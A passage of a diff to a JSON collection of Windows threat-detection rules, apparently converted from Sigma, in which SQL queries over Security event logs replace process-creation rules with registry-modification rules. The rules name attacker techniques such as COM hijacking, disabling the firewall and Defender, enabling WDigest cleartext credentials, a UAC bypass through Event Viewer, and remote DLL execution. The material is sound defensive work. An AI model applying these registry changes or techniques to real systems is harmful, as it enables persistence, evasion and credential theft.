"attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'HH.exe' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '% http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((NewValue LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR NewValue LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml" + "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "Suspicious Regsvr32 Execution From Remote Share", - "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "title": "IE Change Domain Zone", + "id": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", "status": "experimental", - "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Hides the file extension through modification of the registry", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Unknown" + "Administrative scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\\\Domains\\\\%' ESCAPE '\\') AND NOT (NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', '(Empty)')))" ], - "filename": "proc_creation_win_regsvr32_remote_share.yml" + "filename": "registry_set_change_security_zones.yml" }, { - "title": "Use of Squirrel.exe", - "id": "45239e6a-b035-4aaf-b339-8ad379fcb67e", + "title": "Potential Persistence Via Shim Database Modification", + "id": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", "status": "experimental", - "description": "Detects the usage of the \"Squirrel.exe\" binary as a LOLBIN. This binary is part of multiple software installations (Slack, Teams, Discord, etc.)", - "author": "Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.persistence", + "attack.t1546.011" ], "falsepositives": [ - "Expected FP with some electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop,...Etc)" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\squirrel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\update.exe' ESCAPE '\\') AND (((CommandLine LIKE '% --download %' ESCAPE '\\' OR CommandLine LIKE '% --update %' ESCAPE '\\' OR CommandLine LIKE '% --updateRollback=%' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '% --processStart%' ESCAPE '\\' AND CommandLine LIKE '%Discord.exe%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%GitHubDesktop.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--createShortcut%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Teams.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Yammer.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\InstalledSDB\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Custom\\\\%' ESCAPE '\\') AND EventType = 'SetValue') AND NOT (NewValue = ''))" ], - "filename": "proc_creation_win_lolbin_squirrel.yml" + "filename": "registry_set_persistence_shim_databases.yml" }, { - "title": "Copy From VolumeShadowCopy Via Cmd.EXE", - "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", - "status": "experimental", - "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "DHCP Callout DLL Installation", + "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "status": "test", + "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", + "author": "Dimitrios Slamaris", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ - "Backup scenarios using the commandline" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_shadowcopy_access.yml" + "filename": "registry_set_dhcp_calloutdll.yml" }, { - "title": "Use of Setres.exe", - "id": "835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", + "title": "Disable Windows Firewall by Registry", + "id": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", "status": "experimental", - "description": "Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named \"choice\" (with any executable extension such as \".cmd\" or \".exe\") from the current execution path", - "author": "@gott_cyber", + "description": "Detect set EnableFirewall to 0 to disable the windows firewall", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1562.004" ], "falsepositives": [ - "Legitimate usage of Setres" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\setres.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\choice' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\StandardProfile\\\\EnableFirewall' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\DomainProfile\\\\EnableFirewall' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_setres.yml" + "filename": "registry_set_disable_windows_firewall.yml" }, { - "title": "Suspicious Office Token Search Via CLI", - "id": "6d3a3952-6530-44a3-8554-cf17c116c615", + "title": "Potential EventLog File Location Tampering", + "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", "status": "experimental", - "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", + "author": "D3F7A5105", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%eyJ0eXAiOi%' ESCAPE '\\' OR CommandLine LIKE '% eyJ0eX%' ESCAPE '\\' OR CommandLine LIKE '% \"eyJ0eX\"%' ESCAPE '\\' OR CommandLine LIKE '% ''eyJ0eX''%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (NewValue LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_office_token_search.yml" + "filename": "registry_set_evtx_file_key_tamper.yml" }, { - "title": "Remote Access Tool - AnyDesk Piped Password Via CLI", - "id": "b1377339-fda6-477a-b455-ac0923f9ec2c", + "title": "COM Hijacking via TreatAs", + "id": "dc5c24af-6995-49b2-86eb-a9ff62199e82", "status": "experimental", - "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Legitimate piping of the password to anydesk", - "Some FP could occur with similar tools that uses the same command line '--set-password'" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%echo %' ESCAPE '\\' AND CommandLine LIKE '%.exe --set-password%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%TreatAs\\\\(Default)' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml" + "filename": "registry_set_treatas_persistence.yml" }, { - "title": "Suspicious IIS URL GlobalRules Rewrite Via AppCmd", - "id": "7c8af9b2-dcae-41a2-a9db-b28c288b5f08", - "status": "experimental", - "description": "Detects usage of \"appcmd\" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Wdigest Enable UseLogonCredential", + "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "status": "test", + "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of appcmd to add new URL rewrite rules" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:system.webServer/rewrite/globalRules%' ESCAPE '\\' AND CommandLine LIKE '%commit:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_iis_appcmd_susp_rewrite_rule.yml" + "filename": "registry_set_wdigest_enable_uselogoncredential.yml" }, { - "title": "Fsutil Suspicious Invocation", - "id": "add64136-62e5-48ea-807e-88638d02df1e", - "status": "stable", - "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", - "author": "Ecco, E.M. Anhaus, oscd.community", + "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", + "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "status": "test", + "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", + "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", "tags": [ + "attack.persistence", + "attack.execution", "attack.defense_evasion", - "attack.t1070" + "attack.t1112" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment" + "New printer port install on host" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.com%' ESCAPE '\\' OR NewValue LIKE '%C:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_fsutil_usage.yml" + "filename": "registry_set_cve_2020_1048_new_printer_port.yml" }, { - "title": "Mustang Panda Dropper", - "id": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", + "title": "Session Manager Autorun Keys Modification", + "id": "046218bd-e0d8-4113-a3c3-895a12b2b298", "status": "test", - "description": "Detects specific process parameters as used by Mustang Panda droppers", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.persistence", + "attack.t1547.001", + "attack.t1546.009" ], "falsepositives": [ - "Unlikely" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Temp\\\\wtask.exe /create%' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-3,1\\%\\%PUBLIC:~-9,1\\%%' ESCAPE '\\' OR CommandLine LIKE '%/tn \"Security Script %' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-1,1\\%%' ESCAPE '\\') OR (CommandLine LIKE '%/E:vbscript%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\' AND CommandLine LIKE '%/F%' ESCAPE '\\') OR NewProcessName LIKE '%Temp\\\\winwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Session Manager%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\SetupExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\S0InitialCommand%' ESCAPE '\\' OR TargetObject LIKE '%\\\\KnownDlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Execute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppCertDlls%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" ], - "filename": "proc_creation_win_apt_mustangpanda.yml" + "filename": "registry_set_asep_reg_keys_modification_session_manager.yml" }, { - "title": "Fake Instance Of Hxtsr.exe", - "id": "4e762605-34a8-406d-b72e-c1a089313320", - "status": "test", - "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.\nHxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\".\nIts path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\".\nAny instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe\n", - "author": "Sreeman", + "title": "CurrentControlSet Autorun Keys Modification", + "id": "f674e36a-4b91-431e-8aef-f8a96c2aca35", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName = 'hxtsr.exe' AND NOT (CurrentDirectory LIKE 'C:\\\\program files\\\\windowsapps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND CurrentDirectory LIKE '%\\\\hxtsr.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SecurityProviders\\\\SecurityProviders%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Monitors%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NetworkProvider\\\\Order%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Notification Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Authentication Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootVerificationProgram\\\\ImagePath%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor%' ESCAPE '\\' AND (NewValue LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' OR NewValue LIKE 'CutePDF Writer' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%Print\\\\Monitors\\\\Appmon\\\\Ports\\\\Microsoft.Office.OneNote\\_%' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider\\\\Order\\\\ProviderOrder' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver' ESCAPE '\\' AND NewValue = 'VNCpm.dll')))" ], - "filename": "proc_creation_win_hxtsr_masquerading.yml" + "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml" }, { - "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet", - "id": "435e10e4-992a-4281-96f3-38b11106adde", + "title": "UAC Bypass via Event Viewer - Registry Set", + "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", "status": "experimental", - "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects UAC bypass method using Windows event viewer", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADComputer %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_computer_discovery_get_adcomputer.yml" + "filename": "registry_set_uac_bypass_eventvwr.yml" }, { - "title": "Renamed FTP.EXE Execution", - "id": "277a4393-446c-449a-b0ed-7fdc7795244c", - "status": "test", - "description": "Detects the execution of a renamed \"ftp.exe\" binary based on the PE metadata fields", - "author": "Victor Sergeev, oscd.community", + "title": "Disable Exploit Guard Network Protection on Windows Defender", + "id": "bf9e1387-b040-4393-9851-1598f8ecfae9", + "status": "experimental", + "description": "Detects disabling Windows Defender Exploit Guard Network Protection", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.execution", - "attack.t1059", "attack.defense_evasion", - "attack.t1202" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'ftp.exe' AND NOT (NewProcessName LIKE '%\\\\ftp.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\App and Browser protection\\\\DisallowExploitProtectionOverride%' ESCAPE '\\' AND NewValue = 'DWORD (00000001)')" ], - "filename": "proc_creation_win_renamed_ftp.yml" + "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" }, { - "title": "Firewall Rule Deleted Via Netsh.EXE", - "id": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", + "title": "Disable Tamper Protection on Windows Defender", + "id": "93d298a1-d28f-47f1-a468-d971e7796679", "status": "experimental", - "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh", - "author": "frack113", + "description": "Detects disabling Windows Defender Tamper Protection", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate administration activity", - "Software installations and removal" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%delete %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND CommandLine LIKE '%name=Dropbox%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Features\\\\TamperProtection%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_fw_delete_rule.yml" + "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml" }, { - "title": "WSF/JSE/JS/VBA/VBE File Execution", - "id": "1e33157c-53b1-41ad-bbcc-780b80b58288", + "title": "Suspicious Service Installed", + "id": "f2485272-a156-4773-82d7-1d178bc4905b", "status": "test", - "description": "Detects suspicious file execution by wscript and cscript", - "author": "Michael Haag", + "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1562.001", + "attack.defense_evasion" ], "falsepositives": [ - "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." + "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('wscript.exe', 'cscript.exe') OR (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR 